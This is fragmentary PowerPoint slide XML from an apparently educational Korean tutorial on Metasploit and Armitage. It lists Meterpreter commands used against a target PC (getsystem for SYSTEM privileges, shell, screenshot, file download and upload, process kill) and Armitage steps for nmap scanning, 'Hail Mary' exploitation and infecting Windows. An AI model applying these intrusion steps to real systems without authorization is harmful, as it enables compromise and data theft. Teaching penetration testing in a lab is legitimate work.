          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="4938411"/>
            <a:ext cx="6004619" cy="354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u="sng">
                <a:solidFill>
                  <a:schemeClr val="bg1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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg1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&gt; getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="ko-KR" sz="160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A929E654-8E50-446B-931D-D38C5659BCCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340270" y="6058168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9)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권한 확인</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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B7B0D71-AE56-4441-A9C5-3C39D5D133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8067" y="2897503"/>
            <a:ext cx="5913236" cy="14176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EE36CB4-993E-48CC-840C-F817DB8FA89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8067" y="5419508"/>
            <a:ext cx="5913236" cy="312420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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BB1D1A04-0508-4D9D-907A-EBEF70F8C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340270" y="4544048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123825"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8) getsystem</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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7F9DC23-43DF-4107-BD55-D5EB3592487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8067" y="6576756"/>
            <a:ext cx="3629025" cy="628650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CE39B70C-66EA-46E5-9619-61789304F627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="505369" y="7497502"/>
            <a:ext cx="6091033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atinLnBrk="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="1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NT AUTHORITY\SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="1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보이면서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="1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S-1-5-18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="1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임을 확인 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" kern="10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ts val="1200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="1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이는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="1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SYSTEM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="1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권한임을 알려주며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="1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algn="l" latinLnBrk="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="1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Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="1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에서는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400" kern="1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Trusted Installer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1400" kern="10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다음으로 가장 높은 권한</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1400" kern="10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latinLnBrk="0">
              <a:lnSpc>
                <a:spcPts val="1200"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="1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즉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1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Administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="ko-KR" sz="140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권한보다 높은 권한으로 많은 기능을 제약없이 사용</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR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493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해킹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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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1)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대상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pc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에서 파일 실행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 </a:t>
            </a:r>
          </a:p>
          <a:p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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="35107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Execute –f notepad.exe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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="7056465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=&gt;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메모장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(notepad.exe)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실행 확인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9A3FF46-B59A-4DD1-B1CD-882D33555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72" y="2966787"/>
            <a:ext cx="5913236" cy="380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63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해킹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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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2)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대상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pc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에서 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console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접속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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="35107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shell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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="460923" y="8014323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=&gt;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접속 후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D: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드라이브에서 폴더 생성 확인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7CF965-207F-4451-BBA6-027CFD52B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74" y="2964314"/>
            <a:ext cx="5913236" cy="477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39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해킹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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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3)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대상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pc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화면 캡처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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="35107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screenshot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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483841" y="2852977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스크린샷 저장경로 확인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E46BBE-7F96-4752-A56D-CC5B5D8FA1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86"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="523873" y="3358620"/>
            <a:ext cx="5907436" cy="8588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A44477-4CF2-439C-BFA5-AD865E9351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30"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="518073" y="4839628"/>
            <a:ext cx="5913236" cy="115377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992C512-4386-439D-BEBE-4EA905FD1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77" y="6566387"/>
            <a:ext cx="5867400" cy="2102797"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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0594ADC2-AA2F-423B-A711-EDF862672F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506759" y="4381610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 옮기기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5D6210B4-4D1F-474D-AB22-CD8BB962D910}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506759" y="6179154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스크린샷 파일 정상 저장 확인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936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B7D7D8"/>
          </a:fgClr>
          <a:bgClr>
            <a:srgbClr val="EDF7F5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B2DB40D-D024-43AA-9F8F-F8B80E87B0C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6464" y="3726865"/>
            <a:ext cx="5485072" cy="5270500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Ⅰ. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-K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Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MetaSploit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</a:p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Ⅱ.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Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Armitage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Ⅲ.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정리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C9497-C751-49D4-9613-0F131DD31C3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="254003" y="241297"/>
            <a:ext cx="2880000" cy="2880000"/>
            <a:chOff x="1256523" y="234901"/>
            <a:chExt cx="2880000" cy="2880000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="눈물 방울 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D435771-E4CD-4066-A538-704A12BF0D5E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="1256523" y="234901"/>
              <a:ext cx="2880000" cy="2880000"/>
            </a:xfrm>
            <a:prstGeom prst="teardrop">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="204E5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8D5980-5461-46B5-A7AA-DA930ED5FAC1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1505107" y="1290180"/>
              <a:ext cx="23828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INDEX</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="44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769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해킹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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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4)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프로세스 강제종료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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="35107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Kill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pid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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="483841" y="2852977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프로세스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pid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0594ADC2-AA2F-423B-A711-EDF862672F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="5179073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프로세스 제거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C6BC68-16C6-40B6-9F88-E699657282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59"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="3299294"/>
            <a:ext cx="5848350" cy="162627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C4CB9E8-E06C-4AA8-9A5A-27ECBCFC0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71" y="5663552"/>
            <a:ext cx="58197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98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해킹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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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6)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폴더 생성 및 제거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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435275"/>
            <a:ext cx="5913238" cy="76381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mkdir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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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폴더명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]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rmdir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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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폴더명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]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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="3396302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폴더생성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0594ADC2-AA2F-423B-A711-EDF862672F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="6523958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폴더제거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46354B9-2E79-4989-B0C2-DBC432B83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3813755"/>
            <a:ext cx="5900737" cy="234097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91A590-7744-4156-8324-111CA7AED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6997280"/>
            <a:ext cx="5913236" cy="219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32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해킹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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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7)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대상 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pc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-&gt;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 로컬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pc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로 파일 다운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/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업로드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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435275"/>
            <a:ext cx="5913238" cy="76381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Download [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디렉토리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] / [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파일명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]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Upload [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디렉토리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] / [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파일명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]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46A4ED66-97B4-4AF8-BB0C-7C111CEABE23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472381" y="3396302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다운로드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0594ADC2-AA2F-423B-A711-EDF862672F85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="6523958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업로드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572BCA-8AFA-46A5-B7EC-AFAA4166B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77" y="3844260"/>
            <a:ext cx="5762625" cy="24765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7CA88B-6F1D-43A3-BE5B-D60D698FD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77" y="6965773"/>
            <a:ext cx="5762625" cy="226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88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1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="2076457"/>
            <a:ext cx="2298698" cy="546099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531" y="4130500"/>
            <a:ext cx="4933945" cy="135290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Ⅱ. Armitage </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="305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371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1. Armitage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설정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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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1) DB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서버 설치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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>postgresql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)</a:t>
            </a:r>
          </a:p>
          <a:p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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="35107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yum install –y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postgresql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D6A2F44A-CE16-43DC-9D2E-32A043971BEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="3162335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2)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서비스 시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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41D657D-1FD3-4972-BC3F-ACDB10255A94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="3618728"/>
            <a:ext cx="5913238" cy="35107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service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postgresql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start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695736F-3C6C-462C-A847-B55AB377C887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="4257462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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>MsfDB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초기화</a:t>
            </a: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B960D6B5-FD6E-4A62-A9DC-0822CDFCD93C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508093" y="4802180"/>
            <a:ext cx="5913238" cy="35107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msfdb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init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3A351908-6752-4A0F-8AEE-6EBD078E9317}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="5468925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4) Armitage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시작</a:t>
            </a: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2CC2345F-9675-4AFD-988D-E5E0B0896AD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="508093" y="6009750"/>
            <a:ext cx="5913238" cy="35107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armitage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6607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Armitage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시작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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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1) Armitage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접속</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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5CFA73C-3D01-4A55-9388-362D74019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50" y="2636350"/>
            <a:ext cx="5645508" cy="2476846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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E92703A0-D066-41A2-AF33-442BB3BB66AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="5468925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2) Ip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scan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을 통한 대상 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pc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조사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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nmap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)</a:t>
            </a:r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C3886C3-01EA-407F-B2F7-E28B84553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50" y="6187421"/>
            <a:ext cx="5645508" cy="278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17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Armitage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시작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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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3)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특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ip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기반 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host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스캔</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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E92703A0-D066-41A2-AF33-442BB3BB66AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="472382" y="5468925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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ip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 대역 기반 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host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스캔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48ED38-B525-4D84-854F-184A05D30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42" y="2587644"/>
            <a:ext cx="5717916" cy="26229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AE89CCF-5103-47B5-9739-89691926E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42" y="6017713"/>
            <a:ext cx="5717916" cy="326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2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Armitage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시작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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>armitage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를 이용한 윈도우 감염</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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6339E8-2489-45C2-BF25-3CC5C40D2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1" y="2729863"/>
            <a:ext cx="5850739" cy="5260258"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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9CFF0EE-1680-4380-BF1C-EB2B99F9228C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="549322" y="8092352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=&gt;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콘솔창을 활용하여 접근 후 감염성공</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1084335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Armitage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시작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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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6) Attacks -&gt; Find Attack -&gt; Hail Mary</a:t>
            </a:r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9CFF0EE-1680-4380-BF1C-EB2B99F9228C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254003" y="7355090"/>
            <a:ext cx="6385618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(1) Attacks -&gt;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Find Attack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클릭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가능한 공격 검색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DE3E4D7-BB7B-460F-9C11-0A8D1DB5F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81" y="2656824"/>
            <a:ext cx="5667162" cy="4469354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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5A723BC6-3C38-4BC1-B0EE-2366D9D0EC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="254003" y="7937500"/>
            <a:ext cx="6385618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(2) Hail Mary :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 가능한 세션 출력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콘솔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1214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Armitage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시작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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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7)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대상 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pc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에서 공격가능한 포트 검색</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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5A723BC6-3C38-4BC1-B0EE-2366D9D0EC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820060" y="7065574"/>
            <a:ext cx="6385618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020FCFE-8636-4116-B904-8D6320C2D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69" y="2707625"/>
            <a:ext cx="5790290" cy="414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97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1898EFCF-EF1C-40AB-BA71-A382CFBBA3B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="2724152" y="2076457"/>
            <a:ext cx="2298698" cy="546099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531" y="4130500"/>
            <a:ext cx="4933945" cy="135290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Ⅰ. METASPLOIT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="305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27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Armitage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시작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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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8)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대상 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pc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에 대한 공격 선택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 </a:t>
            </a:r>
          </a:p>
          <a:p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5A723BC6-3C38-4BC1-B0EE-2366D9D0EC4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="820060" y="7065574"/>
            <a:ext cx="6385618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=&gt;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Gui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특성을 활용한 공격 선택 가능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ED0FEE-70B3-47AF-95B9-D01CCEF2A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1" y="2634814"/>
            <a:ext cx="5683823" cy="415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10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1.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준비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056907-DBDF-4286-9190-B3E295CDD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72" y="3394870"/>
            <a:ext cx="5913238" cy="4372733"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom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5968750-2E37-4B97-8062-6644A120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2" y="1968500"/>
            <a:ext cx="5913236" cy="354967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1) MSF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콘솔 진입</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p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71A92288-398E-4BA4-BA7E-EEB39A30AA27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="518072" y="2435276"/>
            <a:ext cx="5913238" cy="35107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msfconsole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1472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329930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1.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준비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0A925B45-CEDF-45C9-94E9-7C5C17032077}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="451772" y="2960760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D1E116AA-8D25-4B5F-B3B5-791A2D525E98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
